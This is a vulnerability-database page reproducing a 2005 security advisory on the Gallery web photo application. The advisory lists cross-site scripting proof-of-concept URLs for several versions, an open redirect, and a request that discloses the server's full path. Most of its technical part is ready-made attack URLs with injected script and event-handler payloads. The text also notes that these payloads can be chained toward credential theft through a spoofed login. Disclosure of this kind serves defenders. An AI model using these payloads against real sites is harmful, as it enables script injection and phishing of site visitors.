Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Gallery134.txt

🗓️ 18 Jan 2005 00:00:00Reported by Rafel IvgiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Gallery has Cross Site Scripting vulnerability allowing remote script execution on user devices.

Code
`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application: Gallery  
Vendors: http://gallery.sourceforge.net  
Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha  
Platforms: Windows  
Bug: Cross Site Scripting Vulnerability  
Exploitation: Remote With Browser  
Date: 17 Jan 2005  
Author: Rafel Ivgi, The-Insider  
E-Mail: [email protected]  
Website: http://theinsider.deep-ice.com  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bugs  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
Gallery is open to Cross Site Scripting vulnerability, allowing a remote  
attacker to inject and execute scripts on the user’s machine while visiting  
a remote gallery.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the  
‘index’ field. The injection can be done using the classical tag closing:  
"><script>alert()</script>  
  
For Example:  
http://<valid host>/gallery/add_comment.php?set_albumName=Eros&index=1">  
<script>alert()</script>  
  
  
Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’  
in ALL the fields. The ‘slideshow_low.php’ contains the following form  
fields:  
set_albumName  
slide_index  
slide_full  
slide_loop  
slide_pause  
slide_dir  
  
The injection can be done using the classical tag closing:  
"><script>alert()</script>  
  
For Example:  
http://<valid host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_  
index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&sl  
ide_dir=1  
  
Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the  
‘username’ field. The injection can be done using hex encoded tag closing  
and an HTML event:  
%22%20onactivate%3D"alert%28%29"  
  
For Example:  
http://<valid  
host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"  
  
  
  
Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the  
‘username’ field.  
The injection can be done using hex encoded tag closing and an HTML event:  
%22%20onactivate%3D"alert%28%29"  
http://<valid host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20  
onactivate%3Dalert%28%29%3e  
This version of Gallery also has an open redirection, which is a security  
risk because  
an attacker can send someone a link with a redirection to his evil host name  
or to cause  
the user to commit an attack or waste a target’s resources.  
  
For Example:  
http://<valid host>/gallery/do_command.php?set_fullOnly=on&return=<escape  
encoded evil  
host name>&cmd= All the vulnerabilities described above can be used to  
remotely call  
a JavaScript file The injected JavaScript code is responsible for:  
Automatic launching of malicious code (remote compromise by I.E exploits).  
Identity theft using a spoofed re-login window (only for galleries with  
login)  
  
Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the  
‘g2_form[subject]’  
field. The injection can be done using an inline javascript protocol call:  
javascript:alert()  
  
For Example:  
http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2  
_form[formName]=AddComment&g2_itemId=<valid  
item>&g2_form[subject]=[img]javascript:alert  
()[/img]&g2_form[action][preview]=preview  
  
Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the  
‘g2_subView’ parameter. It is possible the replace any valid subView value  
such as: comment  
:ShowComments with the admin value: core:UserAdmin. This causes the gallery  
to wait 30 seconds  
and then print out the Full Path of the gallery on the server.  
  
For Example:  
http://<valid host>/g2/main.php?g2_return= http://<valid  
host>/main.php%3Fg2_view%3Dcore  
%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session  
id such as:  
be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&g2_subView=core  
:UserAdmin  
  
Then the following data will be printed out to the attacker:  
Fatal error: Maximum execution time of 30 seconds exceeded in  
/mnt/1/<name>/www/<host>/g2/  
modules/core/UserAdmin.inc on line 55  
  
Second Time  
Fatal error: Maximum execution time of 30 seconds exceeded in  
/mnt/1/<name>/www/<host>/g2/  
modules/core/classes/GalleryUtilities.class on line 596  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
Gallery v1.3.4-pl1  
http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>al  
ert()</script>  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><s  
cript>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>  
http://<host>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"  
  
Gallery v1.4.4-pl2  
http://<host>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*  
/%20onactivate%3Dalert%28%29%3e<plaintext>  
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww  
.google.com&cmd=  
  
Gallery v2.0 Alpha  
  
1) http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2  
_form[formName]=AddComment&g2_itemId=<valid  
item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview  
]=preview  
  
2)  
http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%  
3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3  
43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am  
p;g2_view=core:UserAdmin&g2_subView=core:UserAdmin  
  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Scripts and Codes will make me D.O.S , but they will never HACK me."  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4
gallery application cross site scripting remote attacker script injection vulnerable versions windows platform bug details
23